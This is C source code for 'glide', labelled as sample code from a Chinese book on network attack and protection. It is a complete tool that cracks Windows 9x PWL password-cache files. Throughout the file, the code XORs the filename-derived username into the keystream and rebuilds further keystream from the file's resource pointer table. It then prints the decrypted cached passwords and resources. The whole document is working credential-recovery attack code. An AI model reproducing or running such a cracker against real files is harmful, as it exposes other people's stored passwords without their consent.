glide.c

《攻击与防护网络安全与实用防护技术》源代码,一本好书

// Compiled with BC 3.1

#include <stdio.h>
#include <string.h>
#include <ctype.h>
#include <dir.h>

unsigned char Data[10001];      // pwl file buffer, 10K should enough!
unsigned char keystream[1001];  // xor key stream
int Rpoint[300];                // Resource pointers
int size,maxr,cracked;

void RecoverKeyStream()
{
    int sizemask,i,rsz,pos;
    int Rall[300];
    int keylen,len;
	
    /* find allocated recources */
    sizemask=keystream[0]+(keystream[1]<<8);
    for(i=0;i<256;i++) Rall[i]=0;
    maxr=-1;
    for(i=0x109;i<0x208;i++)
    {
        if(Data[i]!=0xff)
        {
			Rall[Data[i]]++;
			if (Data[i]>maxr) maxr=Data[i];
        }
    }
    if (maxr == -1)  return;  // no resource
    maxr=(((maxr/16)+1)*16);
	// recource pointer table size appears to be divisable by 16
	
    /* search after recources */
    keylen = 2 * maxr + 20 + 2;
    Rpoint[0]=0x0208+keylen;   /* first recource */
	
    for(i=0;i<maxr;i++)
    {
        /* find size of current recource */
        pos=Rpoint[i];
        if (pos >= size)
        {
            printf("Decrypt pwl file error!\n");
            maxr = i;
            break;
        }
        rsz=Data[pos]+(Data[pos+1]<<8);
        rsz^=sizemask;
        pos+=rsz+2;
		
        if(i<maxr-1)
        {
            while(pos < size)
            {
                len = (*(unsigned int*)(Data+pos)) ^ sizemask;
                if (Rall[i+1] == 0 && len == 0)
                    break;    // correct position
                if (Rall[i+1] > 0 && len >= 2 && len <= keylen)
                    break;   // may be correct position ?
                pos+=2;    // else, increase by 2
            }
        }
        Rpoint[i+1]=pos;
    }
    Rpoint[maxr]=size;
	
    /* insert Table data into keystream */
    for(i=0;i <= maxr;i++)
    {
        keystream[20+2*i]^=Rpoint[i] & 0x00ff;
        keystream[21+2*i]^=(Rpoint[i] >> 8) & 0x00ff;
    }
    cracked+=maxr*2+2;
}

void DecryptResources()
{
    int i,j,rsz;
	
    /* decrypt resources */
    for(i=0;i<maxr;i++)
    {
        rsz=Rpoint[i+1]-Rpoint[i];
        if (rsz>cracked) rsz=cracked;
		
        if (rsz > 2)
        {
            printf("Recource[%02d] (length: %02d)\n",i,rsz);
            for(j=0;j<rsz;j++)
            {
                unsigned char c = Data[Rpoint[i]+j]^keystream[j];
                printf("%c", c >= 0x20 && c <= 0x7e ? c : '.');
            }
            printf("\n");
        }
    }
}

int main (int argc,char *argv[])
{
    struct ffblk ffblk;
    int i,done,index = 0;
    FILE *fd;
    char *name,ch;
	
    if (argc<2)
    {
		printf("Usage: Pwl pwlfile(s) (eg: *.pwl)");
		return 1;
    }
	
    done = findfirst(argv[1],&ffblk,0);
    while (!done)
    {
        name = ffblk.ff_name;
        printf("\n-----------File %2d: %11s------------\n", ++index,name);
		
		/* read PWL file */
        fd=fopen(name,"rb");
        if (fd==NULL)
			printf("can't open file %s",name);
        else
        {
			size=0;
			while(!feof(fd))
			{
                Data[size++]=fgetc(fd);
			}
			size--;
			fclose(fd);
			
			/* copy encrypted text into keystream */
			cracked=size-0x0208;
			if(cracked<0) cracked=0;
			if(cracked>1000) cracked=1000;
			memcpy(keystream,Data+0x208,cracked);
			
			/* generate 20 bytes of keystream */
			for(i=0;i<20;i++)
			{
				ch=toupper(name[i]);
				if(ch==0) break;
				if(ch=='.') break;
				keystream[i]^=ch;   // xor UserName
			}
			cracked=20;
			RecoverKeyStream();
			// recover key stream (54 bytes or more)
			if (maxr == -1)
                printf("No  resource!\n");
			else DecryptResources();
        }
        done = findnext(&ffblk);
    }
    return 0;
}